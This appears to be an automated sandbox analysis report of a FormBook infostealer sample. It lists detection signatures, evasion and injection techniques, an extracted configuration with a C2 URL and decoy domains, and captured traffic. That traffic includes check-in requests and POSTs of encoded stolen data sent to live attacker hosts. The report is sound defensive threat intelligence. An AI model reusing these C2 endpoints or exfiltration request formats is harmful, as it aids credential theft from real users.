Windows Analysis Report
iuvRyl9i7D

Overview

General Information

Sample Name: iuvRyl9i7D (renamed file extension from none to exe)
Analysis ID: 626605
MD5: f7ecd12d134aaf3541396c78337ce672
SHA1: bb41a84d4f5eef537e41cf4bde375c99bff86a04
SHA256: ec2f5710fdf33c7b843829ebd9f088b15141b643b4354dd92d39b6e290ceca70
Tags: 32, exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsuserc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}
Source: iuvRyl9i7D.exe Virustotal: Detection: 23%
Source: iuvRyl9i7D.exe ReversingLabs: Detection: 19%
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.uspplongee.com/n6g4/ Avira URL Cloud: Label: malware
Source: http://www.properscooter.com/n6g4/ Avira URL Cloud: Label: malware
Source: http://www.kickball.site/n6g4/ Avira URL Cloud: Label: phishing
Source: http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu Avira URL Cloud: Label: phishing
Source: http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe ReversingLabs: Detection: 19%
Source: iuvRyl9i7D.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe Joe Sandbox ML: detected
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: iuvRyl9i7D.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: iuvRyl9i7D.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00611660 FindFirstFileW,FindNextFileW,FindClose, 21_2_00611660
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00611659 FindFirstFileW,FindNextFileW,FindClose, 21_2_00611659
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 4x nop then pop edi 12_2_00417317
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi 21_2_00617316

Networking

Source: C:\Windows\explorer.exe Network Connect: 38.34.163.59 80
Source: C:\Windows\explorer.exe Network Connect: 35.209.127.155 80
Source: C:\Windows\explorer.exe Domain query: www.properscooter.com
Source: C:\Windows\explorer.exe Domain query: www.jamesreadtanusa.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.116.236 80
Source: C:\Windows\explorer.exe Domain query: www.uspplongee.com
Source: C:\Windows\explorer.exe Domain query: www.bldh45.xyz
Source: C:\Windows\explorer.exe Network Connect: 5.183.8.183 80
Source: C:\Windows\explorer.exe Domain query: www.dems-clicks.com
Source: C:\Windows\explorer.exe Domain query: www.kickball.site
Source: C:\Windows\explorer.exe Network Connect: 35.241.47.216 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.216 80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
Source: C:\Windows\explorer.exe DNS query: www.bldh45.xyz
Source: Malware configuration extractor URLs: www.admincost.com/n6g4/
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View ASN Name: INTERXSCH INTERXSCH
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1Host: www.kickball.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1Host: www.bldh45.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1Host: www.properscooter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1Host: www.uspplongee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.kickball.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.kickball.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kickball.site/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.kickball.siteConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.kickball.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kickball.site/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.bldh45.xyzConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.bldh45.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bldh45.xyz/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.bldh45.xyzConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.bldh45.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bldh45.xyz/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.properscooter.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.properscooter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.properscooter.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.properscooter.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.properscooter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.properscooter.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.uspplongee.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.uspplongee.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.uspplongee.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflate
3fe=XG0JYqQnPXmOoDwNVTIIg8rH3_SNonENTCfD2C~t3twYsYVu39gKxTJXV9zpTiIXAYwTY2MvntTl3PKmmir9eyRTqNhIf9tl(WGMAVSY2-rQpzC0iW4gWy0dl6SZvFZjXGF2fOWMKCygu34EkB5dpC8mywMjlo5fb09ueoONE-(RQ-Z82bVvw60k~K4s~WH1MuSyyf7n59U05p98B466SY1D4kCKs3VLiL2p8IjDMRJ76A5N3QTwTcfHLqT5cCm2wcwqP_MiokuZxwQH2yb22-r83C6zCesUmlIHzLy098jGTy9fSFc5zPrLNUfOYvhwtNKaAz42oblSZ-3XBuNqUxqmJI6CW76l7lEbmkauC4PsFfZhjBsFmWjF51q1WJNw(OMhZStd8Hwc(7rNfQ).
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.uspplongee.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.uspplongee.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.uspplongee.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 58 47 30 4a 59 72 73 78 42 47 65 62 33 6a 39 62 58 68 6f 48 72 74 62 4a 77 4a 4f 43 30 53 4d 53 55 32 62 32 37 6d 32 35 32 76 67 4e 37 34 67 68 7a 2d 51 43 78 58 4e 2d 62 76 6d 67 43 54 30 55 41 59 34 78 59 32 49 76 6b 75 53 69 33 6f 4f 63 6e 48 28 79 53 79 52 76 34 64 68 52 56 70 4e 49 28 57 79 2d 41 55 72 44 31 4f 58 51 6f 51 71 30 7a 46 41 37 49 69 31 57 74 62 28 47 77 56 64 45 58 47 64 75 66 4f 36 4d 4b 79 75 67 75 57 49 46 77 32 56 61 67 79 38 6e 7e 51 4e 67 75 49 6b 35 62 30 77 42 65 74 32 4e 46 49 58 52 52 75 35 38 28 49 39 67 37 71 30 68 70 61 34 74 36 57 61 73 4d 75 4f 41 79 62 69 51 35 50 49 30 34 5a 39 39 57 5f 6e 48 58 4c 74 74 36 67 44 59 73 33 52 6d 69 66 58 30 38 4a 4f 59 46 45 4e 41 7e 6d 4d 71 33 56 6a 57 53 38 66 44 41 4b 53 74 63 43 6e 58 77 63 77 51 50 5f 38 69 6f 6e 4f 5a 78 54 59 48 30 53 62 78 39 75 71 57 79 43 36 6f 51 75 67 71 6d 6b 67 68 7a 4c 71 4b 39 4f 6e 47 54 69 4e 66 51 6b 63 34 6e 66 72 4e 4a 55 66 56 50 5f 68 31 74 4e 4c 50 41 33 6b 6d 6f 49 68 53 61 4f 62 58 4d 74 6c 71 57 42 71 6d 48 6f 36 41 44 4c 32 4c 37 6c 63 66 6d 68 32 55 42 4c 6a 73 46 4e 52 68 6b 6b 59 46 72 47 6a 46 32 56 72 69 48 70 63 67 30 4e 64 4f 65 45 4a 39 31 51 35 4f 28 72 36 5f 4b 63 69 54 52 38 34 6c 62 36 45 34 6a 49 28 57 34 33 78 36 63 73 38 68 45 74 79 45 69 77 6d 69 63 68 58 30 69 6a 6b 63 28 30 37 43 46 76 4c 36 4b 58 30 78 78 78 55 42 55 34 76 73 79 6a 6f 73 78 55 74 48 67 48 54 7a 49 62 36 52 4b 48 53 55 7a 70 6d 52 77 66 6c 4c 49 7a 41 6d 62 4e 51 65 7a 6b 4e 77 72 74 66 58 48 2d 66 55 57 36 77 69 75 6b 73 6a 57 41 57 
4d 63 73 4f 7a 78 58 44 69 47 4a 46 66 5a 6e 78 75 30 46 33 5a 6a 50 4f 4b 7e 61 44 79 4d 76 6a 4b 50 36 34 47 37 76 45 68 4a 4e 37 6d 4d 64 46 70 55 32 76 5f 75 53 64 61 35 6e 6c 34 6f 4d 77 49 48 5f 54 48 5a 6c 6b 54 75 57 70 59 75 79 7a 58 52 64 54 47 6d 5a 54 52 74 39 47 44 71 6e 61 67 65 2d 33 59 54 61 69 67 43 72 62 43 54 7a 71 42 68 44 4f 6d 4f 69 52 4b 7e 4d 4a 61 61 31 66 73 56 6e 47 7a 54 38 37 61 70 53 57 4d 78 5a 30 62 28 7a 30 76 31 44 6a 35 44 6c 74 57 45 38 6e 59 47 4c 7e 35 66 78 4e 53 4e 52 62 74 6d 77 74 34 43 37 4c 76 66 69 57 47 5a 62 64 51 61 62 70 75 45 51 4a 62 73 57 36 63 78 33 74 4a 6e 57 64 30 6c 54 39 78 59 76 63 46 38 53 5a 47 51 62 6e 38 65 6c 61 65 6f 35 63 4c 79 31 67 5f 43 4f 73 56 7a 75 4b 52 64 57 42 73 76 47 31 68 6c 6b 35 4f 70 70 52 37 4d 45 73 51 4b 47 69 63 4c 77 45 35 53 62 6e 73 72 70 6b 42 7a 68 50 68 64 54 4a 70 63 39 37 45 7e 30 79 73 49 46 50 6f 39 73 32 68 4f 74 4d 68 73 6b 48 6b 75 33 66 34 46 47 76 4b 72 43 46 4a 39 75 66 59 43 59 4b 79 6b 69 47 39 49 71 50 54
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 13:30:03 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://ansu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://difo.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000003.247473983.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://en.wi5
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://epa.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://genzi.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://gonglang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://haileng.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://hanyang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://kace.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://kuaicong.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://maipu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://meilong.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://mianta.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://nanmang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://penjian.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://qiangai.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://qunben.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://randu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://rechan.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://sangdu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://sanque.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://saoshui.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://shangeng.uspplongee.com/
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://tanshuan.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://tuikun.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://weimen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://wudie.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
